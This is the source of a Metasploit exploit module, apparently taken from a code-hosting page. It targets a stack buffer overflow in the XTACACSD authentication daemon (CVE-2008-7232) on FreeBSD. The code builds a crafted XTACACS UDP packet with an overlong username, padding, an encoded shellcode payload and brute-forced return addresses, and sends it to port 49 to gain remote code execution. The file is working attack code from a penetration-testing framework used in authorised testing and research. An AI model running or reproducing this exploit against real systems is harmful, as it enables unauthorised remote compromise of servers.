Path: blob/master/modules/exploits/freebsd/tacacs/xtacacsd_report.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Udp9include Msf::Exploit::Brute1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'XTACACSD report() Buffer Overflow',16'Description' => %q{17This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By18sending a specially crafted XTACACS packet with an overly long19username, an attacker may be able to execute arbitrary code.20},21'Author' => 'MC',22'References' => [23['CVE', '2008-7232'],24['OSVDB', '58140'],25['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],26],27'Payload' => {28'Space' => 175,29'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",30'StackAdjustment' => -3500,31'PrependEncoder' => "\x83\xec\x7f",32'DisableNops' => true33},34'Platform' => 'bsd',35'Arch' => ARCH_X86,36'Targets' => [37[38'FreeBSD 6.2-Release Bruteforce',39{40'Bruteforce' =>41{42'Start' => { 'Ret' => 0xbfbfea00 },43'Stop' => { 'Ret' => 0xbfbfef00 },44'Step' => 2445}46},47],48],49'Privileged' => true,50'DefaultTarget' => 0,51'DisclosureDate' => '2008-01-08',52'Notes' => {53'Stability' => [ CRASH_SERVICE_RESTARTS, ],54'Reliability' => [ REPEATABLE_SESSION, ],55'SideEffects' => [ IOC_IN_LOGS, ]56}57)58)5960register_options([Opt::RPORT(49)])61end6263def brute_exploit(address)64connect_udp6566sploit = "\x80" # Version67sploit << "\x05" # Type: Connect68sploit << "\xff\xff" # Nonce69sploit << "\xff" # Username length70sploit << "\x00" # Password length71sploit << "\x00" # Response72sploit << "\x00" # Reason73sploit << "\xff\xff\xff\xff" # Result 174sploit << "\xff\xff\xff\xff" # Destination address75sploit << "\xff\xff" # Destination port76sploit << "\xff\xff" # Line77sploit << "\x00\x00\x00\x00" # Result 278sploit << "\x00\x00" # Result 379sploit << make_nops(238 - payload.encoded.length)80sploit << payload.encoded + [address['Ret']].pack('V')8182print_status("Trying target #{target.name} #{'%.8x' % address['Ret']}...")83udp_sock.put(sploit)8485disconnect_udp86end87end888990